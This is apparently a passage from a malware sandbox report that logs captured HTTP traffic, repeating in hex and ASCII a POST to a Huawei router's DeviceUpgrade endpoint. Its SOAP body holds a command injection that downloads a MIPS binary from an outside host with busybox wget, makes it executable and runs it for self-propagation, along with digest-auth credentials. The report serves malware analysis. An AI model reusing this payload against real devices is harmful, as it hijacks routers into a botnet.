67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 